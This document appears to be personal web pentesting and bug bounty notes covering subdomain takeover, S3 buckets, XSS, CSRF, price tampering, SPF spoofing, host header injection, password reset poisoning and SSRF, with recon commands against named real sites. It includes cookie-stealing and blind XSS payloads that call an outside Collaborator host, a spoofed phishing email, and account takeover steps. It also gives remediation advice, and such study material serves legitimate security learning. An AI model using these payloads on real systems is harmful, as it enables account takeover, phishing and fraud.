https://httpstatus.io/

dig subdomain-t CNAME , nslookup subdomain

#automatic tools :

go install -v github.com/LukaSikic/subzy@latest

sudo cp ~/go/bin/subzy /bin/

subzy run --target http://testphp.vulnweb.com

subzy run --target http://testphp.vulnweb.com,test.google.com,https://test.yahoo.com

subzy run --targets list.txt

sudo apt install subjack

subjack -w targets.txt --timeout 30 -t 100 -v

https://github.com/EdOverflow/can-i-take-over-xyz

References :

https://freedium.cfd/https://medium.com/@nnamacha/understanding-azure-subdomain-takeover-
and-traffic-redirection-a-comprehensive-guide-7bc11c5a92f1

https://www.verylazytech.com/network-pentesting/mastering-subdomain-takeover

https://senayakut.com/preventing-aws-subdomain-takeover-cases-and-strategies-for-enhanced-
security-ce455a7d2af3

Sensitive data exposure

Sensitive data exposure in Java happens when confidential information (like passwords, API keys, or
personal data) is improperly handled, stored, or exposed in code. This can lead to security risks such
as data breaches.

Usernames & Passwords

API Keys & Access Tokens

Session IDs

Multi-Factor Authentication (MFA) Secrets etc…

inspect a website's code, open the page in Brave browser, click on the trackpad with two fingers to
access the context menu, select 'View page source', then use the browser's search function to find
links ending with '.js', and investigate those files for potential sensitive information.

https://simplescraper.io/extracturls?utm_source=chatgpt.com

https://www.xml-sitemaps.com/

https ://yourgpt.ai/tools/url-extractor?utm_source=chatgpt.com

#getjs

go install github.com/003random/getJS/v2@latest

sudo cp ~/go/bin/getJS /bin/

getJS --url https://www.dishtv.in/

getJS -input urls.txt | grep -i https

#subjs :

wget https://github.com/lc/subjs/releases/download/v1.0.1/subjs_1.0.1_linux_amd64.tar.g

tar -xf subjs_1.0.1_linux_amd64.tar.gz

sudo mv subjs /usr/bin/

cat urls.txt | subjs

subjs -i urls.txt

NOTE:you can also provide the subdomain list in a file .

#katana
su

go install github.com/projectdiscovery/katana/cmd/katana@latest

sudo cp ~/go/bin/katana /bin/

sudo katana -u target.in -jc | grep js$

sudo katana -list urls.txt -jc | grep js$

#Secret finder

git clone https://github.com/m4ll0k/SecretFinder.git secretfinder

cd secretfinder

sudo apt install python3-requests-file python3-requests python3-jsbeautifier python3-lxml

chmod +x SecretFinder.py

python3 SecretFinder.py -i javaurl

#mantra

go install github.com/Brosck/mantra@latest

sudo cp ~/go/bin/mantra /bin/

cat javaurl | mantra

Sensitive data exposure in GitHub

Sensitive data exposure in GitHub through GitHub dorks is a common security risk. Attackers use
GitHub dorking to search for exposed credentials, API keys, database URLs, and other sensitive
information accidentally pushed to public repositories.

https://gist.github.com/jhaddix/77253cea49bf4bd4bfd5d384a37ce7a4

https://github.com/random-robbie/keywords/blob/master/keywords.txt
https://github.com/0xPugazh/Awesome-Dorks/blob/master/github-dorks.txt

https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt

https://github.com/random-robbie/keywords/blob/master/keywords.txt

https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt

git clone https://github.com/obheda12/GitDorker.git

cd GitDorker

python3 -m venv sai

source sai/bin/activate

pip3 install -r requirements.txt

deactivate

settings > developer settings > personal access tokens > tokens(classic) > generate new token >
generate new token classic > provide any name and select all options at scope >generate token

cd tf

nano TOKENSFILE { add all list of tokens }

python3 GitDorker.py -d Dorks/medium_dorks.txt -tf tf/TOKENSFILE -q anits.edu.in -lb

python3 GitDorker.py -d Dorks/alldorksv3 -tf tf/TOKENSFILE -q anits.edu.in -lb

Finding Misconfigured Aws s3 Buckets

AWS S3 (Simple Storage Service) is commonly misconfigured, leading to severe security risks such as
data exposure, takeover, and unauthorized modifications.

Buckets with “Public Read” or “Public Write” permissions allow anyone to view or modify data.

https://buckets.grayhatwarfare.com/
https://buckets.grayhatwarfare.com/top_keywords { top keywords }

AWS Access key ID and AWS Secret Key = git hub dork’s

site:http://s3.amazonaws.com intitle:index.of.bucket

site:http://amazonaws.com inurl:".s3.amazonaws.com/"

site:.s3.amazonaws.com "Company"

intitle:index.of.bucket

site:http://s3.amazonaws.com intitle:Bucket loading

site:*.amazonaws.com inurl:index.html

https://bkname.s3.amazonaws.com/

https://bkname.s3.amazonaws.com/filename

sudo apt install awscli

aws s3 ls s3://bucketname --no-sign-request

Listing files in public s3 bucket.

aws s3 cp s3://bkname/filename /home/saijain --no-sign-request

wget https://bkname.s3.amazonaws.com/filename

Download File from a public s3 bucket.

aws configure

Set up credentials to aws cli

provide aws access key id and aws secreat key

aws configure list

To check credentials are saved and It helps to see the credentials.

aws s3 ls s3://bucketname

aws s3 cp s3://bkname/filename /home/saijain

aws s3 cp localfilename s3://bucketname

Upload a local file into the s3 bucket.

git clone https://github.com/nahamsec/lazys3.git

cd lazys3

sudo apt install ruby

ruby lazys3.rb "dishtv" , ruby lazys3.rb "anits"

go install -v github.com/sa7mon/s3scanner@latest

s3scanner -bucket bkname -enumerate permmison and no of obj

https://github.com/koaj/aws-s3-bucket-wordlist

s3scanner -bucket-file list.txt -enumerate check valid bk by word and permmison and objects

all tools list : https://github.com/mxm0z/awesome-sec-s3?tab=readme-ov-file

XSS ( cross site scripting )

Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject malicious
scripts into web pages viewed by other users. This can lead to data theft, session hijacking,
defacement, and more.

Types of XSS Attacks

1. Stored XSS (Persistent XSS)

The malicious script is permanently stored on the target server (e.g., in a database, forum post, or
comment section).
Whenever a user loads the affected page, the script executes in their browser.

Example: A hacker injects a <script> tag into a comment box, which steals cookies from all visitors.

Popular vulnerability

It shows popup

2. Reflected XSS (Non-Persistent XSS)

The malicious script is included in a URL and executed when the victim clicks the link.

It is not stored on the server but reflected back to the user through HTTP responses.

Example: A phishing email contains a link like:

http://victim.com/search?q=<script>alert('XSS')</script>

If the website does not sanitize input, the script executes.

Popular vulnerability

It shows popup

3. DOM-Based XSS

The attack occurs when JavaScript modifies the DOM (Document Object Model) dynamically without
proper validation.

The script is executed client-side, without reaching the server.

Example:

var userInput = location.hash;

document.write(userInput); // Dangerous if not sanitized

If the user visits http://example.com#<script>alert('XSS')</script>, the script executes in their

browser.

Least popularity vulnerability

4. Blind XSS(a type of persistent xss)

Similar to Stored XSS, but the attacker does not immediately see the execution.

The payload is stored and executed later in an admin panel or internal dashboard where an admin
unknowingly triggers it.
Medium popularity vulnerability.

No popup at realtime

You insert your payload all input field ,like in comment section,signup forms,contact forms,feedback
forms etc..

Burp add to scope ,spinder the host ,select the parameter ,send to repeater input blind zss payloads
at host,origin,referer,user agent header,parameter .

Any parameter id=blind xss paylaod

Bxsshunter.io { you will get xss fire if xss exist } { use the website payload }

Burp collaborator

Go to buru suite app, burp > burp collaborator client > copy to clipboard

“><script src=burpcode.burpcollaborator.net></script>

<img/src=https://burpcode.burpcollaborator.net>
Insert payload at all inpuput field’s

Poll now

You will get http request and in that packet ip also available.

Payload:

</scrip</script>t><img src=q onerror=prompt(document.cookie)>

"></script>"><--<img+src= "><svg/onload=alert(document.cookie)>> --!>

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

https://github.com/payloadbox/xss-payload-list

XSS find ?

Any input form or search field

review and comment section ,account creation name field and username field and password field ,
email field ,phone no field ,adding address and editing address,email subscribe,order tracking
through id {stored }

Parameters ex:id=xss script { reflected}

NOTE:

We can try to xss to account takeover or even ssrf or even other high severity vulnerability.

Try login with fake user name and fake password and intercept through burp suite > do intercept >
response to this request > 302 you must login > add > set-cookie:cookie > forward
Cloudflare bypass payload’s:
Xss finding through .svg file at profile picture update funcanality.

<?xml version="1.0" standalone="no"?>

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"

"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">

<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

alert("sai jain");

</script>

</svg>

Common XSS Attacks:

Stealing cookies or session tokens to hijack user sessions.

Redirecting users to malicious websites.

Defacing websites by altering webpage content.

Keylogging to capture user inputs.

Approaches of shielding your site against Cross-Site Scripting (XSS)

Here are some common approaches for shielding your site against Cross-Site Scripting (XSS) attacks:

Input Validation: Validate all user inputs before using them in your application. This can help to
prevent attackers from injecting malicious code into your site.

Escaping: Convert any special characters in user inputs into their HTML entity equivalents before
using them in your application. This will prevent the special characters from being executed as code
in the user's browser.

Use of Prepared Statements: Use prepared statements or parameterized queries when interacting
with a database to prevent attackers from injecting malicious code into your SQL statements.

Content Security Policy (CSP): Implement a Content Security Policy (CSP) that specifies which
content sources can be executed within your web application. This can help to prevent XSS attacks by
blocking malicious scripts from being executed.

Web Application Firewall (WAF): Use a Web Application Firewall (WAF) to monitor and filter HTTP
traffic to your web application and block requests containing malicious code.
Regular Security Updates and Patches: Regularly update your software and apply security patches to
address any known vulnerabilities in your web application.

Security Testing: Regularly test your web application for security vulnerabilities, including XSS
attacks, using automated tools or manual penetration testing.

CSP (Content Security Policy)

Content Security Policy (CSP) is a security feature that helps prevent web attacks like Cross-Site
Scripting (XSS) and data injection by controlling which resources (scripts, styles, images, etc.) a web
page can load. It acts as a browser-enforced whitelist for trusted content sources.

What Does CSP Block?

CSP can block various types of potentially dangerous content, including:

1. Inline JavaScript & CSS – Blocks <script> tags and style attributes unless explicitly allowed. Prevents
inline event handlers like onclick="alert(1)".

2. External Scripts – Restricts script loading from untrusted domains (e.g., preventing a malicious
script from attacker.com).

3. Dynamic Code Execution – Blocks eval(), setTimeout("alert(1)"), and new Function() by default.

4. Mixed Content – Blocks HTTP content on an HTTPS site (e.g., prevents loading an insecure image
or script).

5. Framing & Embedding – Prevents the page from being loaded inside iframes (Clickjacking
protection).

Does CSP Apply to All Websites or Specific Pages?

CSP is defined using the Content-Security-Policy HTTP header or <meta> tag.

It applies only to pages where it is set.

Each page can have its own CSP rules.

Example of setting CSP in an HTML page:

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'

https://trusted.com;">

This allows scripts only from the same site (self) and trusted.com.

What Happens in the Browser When CSP is Applied?

1. The browser reads the CSP rules from the HTTP header or <meta> tag.

2. It blocks any scripts, styles, or other resources not allowed by the CSP.
3. If a blocked script tries to execute, the browser shows a CSP violation error in the console

Same-Origin Policy (SOP)

SOP is a security rule in web browsers that blocks a website from accessing data from another
website unless both have the same origin (same domain, protocol, and port).

Example (Blocked by SOP)

Imagine you open Site A (https://example.com) in your browser. If Site A tries to request data from
Site B (https://another-site.com), the browser blocks it for security reasons.

Why is SOP important?

Prevents hackers from stealing your data from other websites.

Stops malicious websites from making unauthorized requests.

Cross-Origin Resource Sharing (CORS) – Basic Explanation

CORS is a way for websites to allow controlled access to their resources from different origins. A
server can use CORS headers to say:

✔ "Yes, this other website is allowed to request my data."

Example (Allowed by CORS)

Site A (https://frontend.com) wants to access an API at Site B (https://api.server.com).

Normally, SOP blocks this request.

But if Site B’s server adds a special CORS header in http response.

Access-Control-Allow-Origin: https://frontend.com
Then, the browser allows the request!

Why is CORS used?

Allows secure data sharing between trusted websites.

Helps web applications access external APIs.

HTTP Header

An HTTP header is a key-value pair that is sent with HTTP requests and responses between a client
(browser, API client) and a server. These headers provide important metadata about the request or
response, such as content type, authentication, caching policies, and more.

What Type of Data is in an HTTP Header?

HTTP headers contain key-value pairs that provide metadata about an HTTP request or response.
These headers carry different types of data, including:

1. Client Information

Identifies the client making the request.

Example:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Explanation: Indicates the browser, operating system, and device information.

2. Server Information

Provides details about the server responding to a request.

Example:

Server: Apache/2.4.41 (Ubuntu)

Explanation: Specifies the web server software and version.

3. Authentication Data

Used for user authentication and authorization.

Example:

Authorization: Bearer <access_token>

Explanation: Sends an authentication token to access protected resources.

4. Content Information

Defines the type, encoding, or language of the content.

Example:
Content-Type: application/json

Explanation: Specifies that the response contains JSON data.

5. Caching Directives

Controls how data is cached by the browser or proxy.

Example:

Cache-Control: max-age=3600

Explanation: Tells the browser to cache the response for 3600 seconds.

6. Security Policies

Helps prevent security vulnerabilities.

Example:

Strict-Transport-Security: max-age=31536000; includeSubDomains

Explanation: Forces HTTPS connections to protect against downgrade attacks.

7. Cookies & Session Data

Manages user sessions.

Example:

Set-Cookie: session_id=abc123; HttpOnly; Secure

Explanation: Stores a session ID that the client uses in subsequent requests.

Types of HTTP Headers

1. Request Headers

Sent by the client (browser, API client) to the server to provide information about the request.

Examples:

Host: Specifies the domain name of the server.

User-Agent: Provides details about the client's browser and operating system.

Accept: Defines the media types the client can handle (e.g., text/html, application/json).

Authorization: Sends authentication credentials (e.g., Bearer <token> for OAuth).

Referer: Indicates the URL the request originated from.

2. Response Headers

Sent by the server to provide information about the response.

Examples:

Server: Identifies the server software (e.g., Apache/2.4.41).

Content-Type: Specifies the MIME type of the response (text/html, application/json).

Set-Cookie: Sends a cookie to the client for session management.

Cache-Control: Defines caching policies (e.g., no-cache, max-age=3600).

WWW-Authenticate: Requests authentication from the client.

CSRF

CSRF (Cross-Site Request Forgery) is a web security vulnerability that tricks a user into executing
unwanted actions on a web application where they are authenticated. Attackers exploit CSRF by
sending malicious requests on behalf of the user without their consent.

Changing Username, Password, or Email ID, Transferring Funds, Modifying Payment Methods etc..

Client side attack.

Method:

Intercept password changing request in attacker account using burp suite.

Right click > engagement tool > generate csrf poc > options > tick on the include auto submit script >
generate > copy html

In attacker computer create a file using notepad name as csrf.html and paste the copied html code
from burp suite.

Share the file lo victim, when victim opens the file in browser boom.
Right click > change request method.
Price Tampering

Price Tampering Vulnerability is a security flaw in web applications where an attacker manipulates
the price of a product or product quantity service before making a purchase. This is typically done by
modifying client-side parameters (such as form fields, cookies, or API requests) using tools like Burp
Suite to gain unauthorized discounts or free products due to improper server-side validation.

Steps to Exploit Using Burp Suite:

1. Intercept the Purchase Request:

Open Burp Suite and turn Intercept ON under the Proxy tab.

Add a product to the cart and proceed to checkout.

Capture the HTTP request sent from the browser.

2. Modify the Price Parameter:

The intercepted request may look like this:

POST /checkout HTTP/1.1

Host: example.com

Content-Type: application/json

"product_id": "123",

"price": "100",

"quantity": "1"

Modify the "price" value to "1":

"product_id": "123",

"price": "1",

"quantity": "1"

}
3. Forward the Modified Request:

Click "Forward" to send the modified request to the server.

If the server does not validate the price against its database, the purchase will be processed at the
altered price.

4. Check the Response:

If the server accepts the modified price and proceeds to payment or confirms the order at ₹1 instead
of ₹100, the vulnerability is successfully exploited.

Bypass :change request method,-500,0,150-150,1.50,1

How to Prevent Price Tampering:

1. Server-Side Validation: Ensure the price is fetched from the server database, not from the client
request.

2. Use Fixed Pricing on the Backend: The server should ignore price values sent from the client.

3. Implement Digital Signatures: Encrypt price values using HMAC or digital signatures to prevent
tampering.

4. Monitor Suspicious Transactions: Flag and review unusually low-price purchases.

5. Use Web Application Firewalls (WAF): Detect and block parameter manipulation.

Low hanging fruits : any vulnerability that is quite to easy to find .

Broken Link Hijacking (BLH)

It is a security vulnerability where attackers take control of abandoned or broken links on a website
to redirect users to malicious content, phishing pages, or exploit search engine optimization (SEO).

This happens when a website links to an external resource (like an image, JavaScript file, or social
media profile) that is no longer available because the domain expired, the account was deleted, or
the resource was removed. Attackers can register the expired domain or recreate the deleted
account to gain control over the linked content.
Real life Example : Social Media Takeover – A company removes its Twitter, Instagram, or LinkedIn
profile, but its website still links to it. Attackers create a new account with the same username to
impersonate the brand.

How to Prevent Broken Link Hijacking:

Regularly audit external links – Use tools like Screaming Frog SEO Spider or Burp Suite to find
broken links.

Self-host critical resources – Avoid relying on third-party CDNs or external scripts.

Redirect deleted social media profiles – If a brand changes social handles, update the website
links.

Monitor expired domains – Use Google Search Console or site crawlers to check for outdated
links.

Use Content Security Policy (CSP) – Restrict the execution of external scripts using CSP headers.

A missing SPF (Sender Policy Framework) record means that a domain does not have an SPF DNS
record configured to specify which mail servers are allowed to send emails on behalf of the domain.
Without SPF, attackers can spoof emails, making them appear as if they were sent from a legitimate
domain.

Automatic tool :apt install npm

npm install broken-link-checker -g

broken-link-checker https://dishtv.in -ro

Missing SPF Record

SPF helps prevent email spoofing and phishing attacks by allowing email servers to verify if the email
is sent from an authorized mail server. If an SPF record is missing, anyone can forge emails
pretending to be from your domain.

How to Check if SPF is Missing?

You can check a domain’s SPF record using:

1. Online Tools:
https://mxtoolbox.com/SPF.aspx

https://dnschecker.org/spf-record.php

Kitterman.org/spf/validate.html

2. Command Line (Linux/macOS/Windows PowerShell)

nslookup -type=TXT example.com

3. Extract Email Addresses from the Target Website:

Scrape or manually find emails from contact pages, About Us, privacy policies, or blog posts.

Use Google Dorks to find emails:

site:example.com "email"

site:example.com "contact@"

4. Send a Spoofed Email Using a Fake SMTP Server:

The attacker uses an SMTP service (like sendmail or Mailx) or online tools like GoPhish or SMTP open
relays.

Example using sendmail:

sendmail -t

From: [email protected]

To: [email protected]

Subject: Urgent Update

[ OR ]

Emkei.cz , spoofbox.com
Please update your password immediately by clicking this link: http://fake-site.com

Since SPF is missing, the recipient’s email server does not verify the sender’s legitimacy, and the
email lands in the inbox.

5. Victim Thinks the Email is Legitimate

The victim believes the email is from the official domain and may click on phishing links or download
malware.

Risks of a Missing SPF Record

Email Spoofing – Attackers can send phishing emails pretending to be your company.

Poor Email Deliverability – Your emails might go to spam or be rejected.

Brand Damage – Customers and partners might receive fake emails from your domain.

Soft fail vs hard fail

1. SoftFail (~all)

Behavior: If an email is sent from an unauthorized server, the recipient’s mail server marks it as
suspicious but still delivers it (usually to Spam/Junk).

Reason to Use: If you're testing SPF settings or want to allow some unauthorized emails to pass for
monitoring.

Example SPF Record with SoftFail:

v=spf1 include:_spf.google.com ~all

Impact:

Email might still be delivered.

More vulnerable to email spoofing (attackers can impersonate your domain).

2. HardFail (-all)

Behavior: If an email is sent from an unauthorized server, the recipient’s mail server rejects it
outright (bounces back).

Reason to Use: If you want strict email security and prevent unauthorized senders from using your
domain.
Example SPF Record with HardFail:

v=spf1 include:_spf.google.com -all

Origin ip disclosure

Origin IP disclosure is a vulnerability where an attacker can obtain the real IP address of a web server,
even if it is protected behind CDN services (Cloudflare, Akamai, etc.), WAFs, or proxies.

Impact:ports scaning & exploit port's

exploit web server vulnerabilities

DDOS etc..

shodan :hostname:dishtv.in

censys :provide domain name

Session Not Expiring After Password Change

Broken authentication & session management { tittle }

1. Log in to the same IGP.com account on two different browsers: Google Chrome and Brave.

Use Email or Phone Number along with the Password to log in.

2. In Brave, navigate to:

Account Settings > Profile Settings > My Profile > Change Password

3. Change the password and confirm the update.

4. Observe that Brave logs out automatically after the password update.

5. Switch to Chrome, which is still logged into the same account.

6. Attempt to access account settings, personal data, or make transactions.

Expected Behavior:

After a password change, all active sessions across different browsers should immediately expire,
requiring re-login.

Actual Behavior:

The session in Chrome remains active, even after a password change in Brave.

The user can still access personal data and perform actions without re-authentication.

Impact:

This is a security risk because if an attacker gains access to an active session, they can continue using
it even after a password reset.

Users expect all active sessions to be logged out when they update their password, preventing
unauthorized access.

Suggested Fix:

Invalidate all active sessions when a user updates their password.

Revoke authentication tokens and session cookies across all devices and browsers.

Implement session expiration policies for better security.

Long Password DoS Attack – Testing in Burp Suite (During Account Creation)

If a website does not properly limit password length during account creation, an attacker can send
extremely long passwords to overload the server. Here’s how you can test it using Burp Suite.

🛠 Steps to Perform Long Password DoS Attack Using Burp Suite

Intercept the Account Creation Request

1. Open Burp Suite and enable Intercept On in the Proxy tab.

2. Go to the target website’s Sign-Up / Register page and enter normal details.

3. Enter any password (e.g., 12345678) and click Sign Up.

1. In Burp Suite, intercept the request.

2. Look for the password parameter:

POST /register HTTP/1.1

Host: example.com

Content-Type: application/x-www-form-urlencoded

username=testuser&[email protected]&password=12345678

3. Replace the password with a very long string (1 million+ characters).

manually paste a long password:

password=123456781234567812345678 etc ..(repeat for 1 million times)

Observe the Server Response

If the website is secure:

It should return an error like:

400 Bad Request: Password Too Long

Response time should stay normal (~<1 sec).

How to Fix This Vulnerability?

Set a maximum password length (e.g., 128 characters) server-side.

Reject unusually large requests before processing.

Implement rate-limiting to prevent repeated abuse.

Use a strong hashing algorithm (e.g., bcrypt, Argon2) with safe limits.

1. Delayed or No Response (Server Overload)

Sign: The response takes a long time (5-10+ seconds) or never comes back.

2. Internal Server Error (Crash)

Sign: The server crashes due to excessive CPU/memory usage.

Possible Response:

HTTP/1.1 500 Internal Server Error

Content-Type: text/html

3. Memory Exhaustion Error

Sign: The server runs out of memory and stops processing.

Possible Response:

Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 8388608 bytes)

4. Website Becomes Unresponsive for Other Users

The entire website slows down or becomes inaccessible because the attack consumes server
resources.

Other users might see "Service Unavailable" (HTTP 503) errors.

Price Tampering

Price tampering refers to the deliberate alteration or manipulation of prices, typically to deceive
customers or gain an unfair advantage. This can happen in various contexts, such as retail, e-
commerce, or services. The goal of price tampering is usually to make products or services appear
cheaper than they are, or more expensive than they should be, in order to mislead or exploit
consumers.

You can change price from starting point to ending point ,ex :adding product in cart to final gatway
generation time.

Or else change at only final payment gatway generation time.

In Some websites , price should will not display .

0,-100,100-100,1

Chage request method in burp suite {bypass}

Impact of Price Tampering Vulnerabilities

Loss of Revenue

Impact: If attackers manipulate prices (for example, lowering prices artificially), they can cause
businesses to lose money. Customers may end up paying far less than intended, leading to financial
losses for the business.

Remediations for Price Tampering Vulnerabilities

Server-Side Price Validation

Remediation: Ensure that the final price is validated on the server-side, not just on the client-side
(user’s browser). Never rely on the data shown on the user’s browser to determine the final price
because it can be easily manipulated.

How to Implement: Use secure APIs to retrieve and display prices, and ensure that the server
performs checks on the price before processing payment.

Secure Payment Systems

Remediation: Implement secure and trusted payment gateways. Ensure that the payment gateway
does not allow for price manipulation or changes during the transaction.

How to Implement: Use HTTPS for secure transactions and use trusted third-party payment services
like PayPal, Stripe, or others to process payments securely.

Real-Time Price Transparency

Remediation: Display a clear breakdown of all charges (including taxes, shipping, and discounts)
throughout the shopping process, not just at checkout. This ensures the customer is aware of the full
price at all times.

How to Implement: Update the cart with real-time price changes whenever a new coupon is applied,
or shipping options are selected, ensuring the customer is always aware of the price changes.

Implement Strong Authentication & Authorization

Remediation: Protect admin interfaces and backend systems with strong authentication to ensure
only authorized personnel can modify pricing. This prevents unauthorized access and tampering by
insiders or hackers.

How to Implement: Use two-factor authentication (2FA) for administrators, role-based access control
(RBAC), and regular audits of your backend systems to detect any unusual changes.

Use of Secure APIs for Pricing Information

Remediation: Ensure that all price data is transferred securely and cannot be intercepted or
manipulated by attackers. This includes using encrypted connections and securing any public APIs.

How to Implement: Ensure all API endpoints involving pricing data use SSL/TLS encryption and
employ methods like API keys or OAuth for secure access.

Auditing and Logging

Remediation: Regularly audit and log all pricing changes to identify any unauthorized changes or
tampering attempts.

How to Implement: Set up logging mechanisms to track all price modifications. Review logs for
unusual activity regularly and trigger alerts for suspicious changes to pricing.

Penetration Testing and Vulnerability Scanning

Remediation: Conduct regular penetration testing and vulnerability scanning to identify and fix any
weaknesses in the system that could lead to price tampering.

How to Implement: Hire cybersecurity experts or use automated vulnerability scanning tools to test
your website’s security and ensure there are no exploitable flaws.

User Education

Remediation: Educate your customers about the legitimacy of prices and discounts on your site. This
can help reduce the impact of price tampering if customers are aware of what to expect.

How to Implement: Clearly communicate your pricing policies, discounts, and any terms and
conditions around pricing on your website to foster customer trust.

Host Header Injection

It is a type of security vulnerability in web applications where an attacker manipulates the Host
header in an HTTP request to send arbitrary data to the server. The Host header indicates which
domain the client is requesting, and most web servers use it to determine the correct resource to
serve.

Host Header injection can lead to :

Open redirection vulnerability

Web cache poisioning attack

Password reset poisioning attack

Xss attack

Ssrf

X-Forwaded-Host:bing.com { add below host field }

HOST:bing.com

X-Forwaded-Host:original domain name { add below host field }

HOST:original domain name

Referer:bing.com { add below host field }

HOST:bing.com

Referer:bing.com

Web Cache Poisoning

It is a type of attack in which an attacker manipulates the web cache (either on the server or in
intermediate caching layers such as reverse proxies or CDNs) to serve malicious or unintended
content to users. This happens when the cache stores content that is intended to be unique for
certain users but is instead incorrectly cached and later served to others. Essentially, the attacker
poisons the cache with a malicious response, which can then be served to other users accessing the
same resource

The general flow of caching works like this:

Client makes a request: The client (e.g., a browser) sends a request to the web server (e.g.,
requesting a webpage or API data).

Server processes the request: The server processes the request and generates a response. This
response could either be dynamic (based on user input, session, etc.) or static (e.g., an image,
stylesheet, etc.).

Cache storage: Once the server has processed the request and sent the response, the response is
stored in a cache (either on the server itself or in an intermediate caching layer like a Content
Delivery Network (CDN) or a reverse proxy). Caching is done to avoid reprocessing the same request
over and over again, which can improve performance and reduce the load on the server.

Next request: If the client or another user makes the same request again (or a request that matches
the cached content), the cache (not the server) provides the stored response instead of the server
reprocessing the request. This is faster because the cache can quickly return the response without
the need for the server to generate it again.

Miss vs hit

1. Cache Miss:

A cache miss occurs when the requested data is not found in the cache. When a cache miss
happens, the system needs to go to the original data source (such as the web server, database, or
external API) to retrieve the content, and then it will store this content in the cache for future use.

Example:
Step 1: A user visits a website that hasn't been previously visited by anyone, so the requested
resource isn't in the cache.

Step 2: The server processes the request, generates the response, and sends it to the cache and
saved in cache and send backs to the user..

Result: The server response is stored in the cache for future requests.

In subsequent visits, the response could be served from the cache (if it's a cache hit), reducing load
on the server.

2.Cache Hit:

A cache hit occurs when the requested data is found in the cache. In this case, the cache stores the
response for a specific request (like a web page or image), and the system returns the cached
content directly to the client without needing to retrieve it from the original source (such as the web
server).

Example:

Step 1: A user visits a website, and the response is stored in the cache.

Step 2: The same user (or someone else) visits the same website again.

Result: The cached response is served directly from the cache because it hasn't changed or expired.
This saves time and resources by avoiding redundant processing on the server.

Fresh Request to the Server:

By adding ?dc=1234

First, check if the application is vulnerable to Host header injection; if vulnerable, inject an XSS
payload by adding the Host or X-Forwarded-Host headers and check the response for successful
injection. If the XSS payload is injected, and the response is cached, any subsequent visitor to the
website will automatically see the XSS alert due to the cached malicious content.

HOST: <script>alert('1’)</script>

X-Forwarded-Host: <script>alert('1’)</script>

Password reset poisoning

Password reset poisoning refers to a type of attack where an attacker manipulates or exploits the
password reset process to gain unauthorized access to a user's account. This can be done by
intercepting or altering the reset request, often by changing the email address or reset token, so the
attacker can reset the password and take control of the account.
• Password reset link generation with attacker account: A password reset link is generated with the
attacker's account, and the reset email will be received by the attacker.

• Check for host header injection vulnerability: Check if the system is vulnerable to host header
injection by adding the 'Host' or 'X-Host' field. If successful, the attacker will receive the password
reset email with a malicious URL containing {bing.com } and the token ID, indicating the vulnerability.

• Generate password reset link with attacker email: Regenerate the password reset link with the
attacker’s email or username. Modify the request to add 'Host' or 'X-Forwarded-Host' with the server
URL and change the attacker’s email ID to the victim's email or username.

You can also use buro collaborator client url at server url

• Monitor access log of the exploited server: Monitor the access log of the exploited server.

• Capture victim's token ID: In the server access logs, you will find the victim’s token ID. Copy that
token ID.

• Access the reset link: At first, the attacker’s account password reset link will appear. Copy that link,
paste it into the browser, and change the token to the victim’s token ID.

• Victim password setup: When you visit the modified link, the victim’s account will show the new
password setup page, allowing the attacker to set a new password for the victim's account.

SSRF

SSRF stands for Server-Side Request Forgery. It’s a type of web security vulnerability where an
attacker tricks a server into making HTTP requests to arbitrary domains or IP addresses, including
internal systems not directly accessible from the internet.

Types :

1.Regular

2.Blind

Parameter’s : dest , php_info , callback , id , file , page , url , uri , path , root , site , referrer , continue ,
window , reference , redirect , parth , data , html

Pipedream.com inject their code at paramet’s ex : id=code { burp suite }

Payloads :

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20
Forgery/README.md

http://localhost:80
http://localhost:22

https://localhost:443
http://127.0.0.1:80

